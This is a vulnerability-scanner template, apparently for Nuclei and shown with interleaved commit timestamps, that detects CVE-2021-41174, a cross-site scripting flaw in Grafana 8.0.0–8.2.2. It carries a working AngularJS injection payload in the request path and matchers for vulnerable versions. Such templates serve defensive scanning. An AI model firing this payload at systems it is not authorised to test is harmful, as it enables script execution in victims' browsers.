2021-11-06 22:38:43 +00:00
id : CVE-2021-41174
info :
2022-11-29 05:49:36 +00:00
name : Grafana 8.0.0 <= v.8.2.2 - Angularjs Rendering Cross-Site Scripting
2021-11-06 22:38:43 +00:00
author : pdteam
severity : medium
2022-05-17 09:18:12 +00:00
description : Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.
2021-11-06 22:38:43 +00:00
reference :
- https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8
- https://nvd.nist.gov/vuln/detail/CVE-2021-41174
2022-05-17 09:18:12 +00:00
- https://github.com/grafana/grafana/commit/3cb5214fa45eb5a571fd70d6c6edf0d729983f82
- https://github.com/grafana/grafana/commit/31b78d51c693d828720a5b285107a50e6024c912
remediation : Upgrade to 8.2.3 or higher.
2021-11-06 22:43:41 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-11-06 22:43:41 +00:00
cve-id : CVE-2021-41174
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:*
epss-score : 0.96854
2022-04-22 10:38:41 +00:00
metadata :
2023-04-28 08:11:21 +00:00
max-request : 1
2022-04-22 10:38:41 +00:00
shodan-query : title:"Grafana"
tags : cve,cve2021,grafana,xss
2021-11-06 22:38:43 +00:00
2023-04-27 04:28:59 +00:00
http :
2021-11-06 22:38:43 +00:00
- method : GET
path :
- "{{BaseURL}}/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1"
skip-variables-check : true
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
- "Grafana"
- "frontend_boot_js_done_time_seconds"
condition : and
- type : regex
regex :
- '"subTitle":"Grafana (v8\.(?:(?:1|0)\.[0-9]|2\.[0-2]))'
extractors :
- type : regex
group : 1
regex :
2022-03-06 16:52:34 +00:00
- '"subTitle":"Grafana ([a-z0-9.]+)'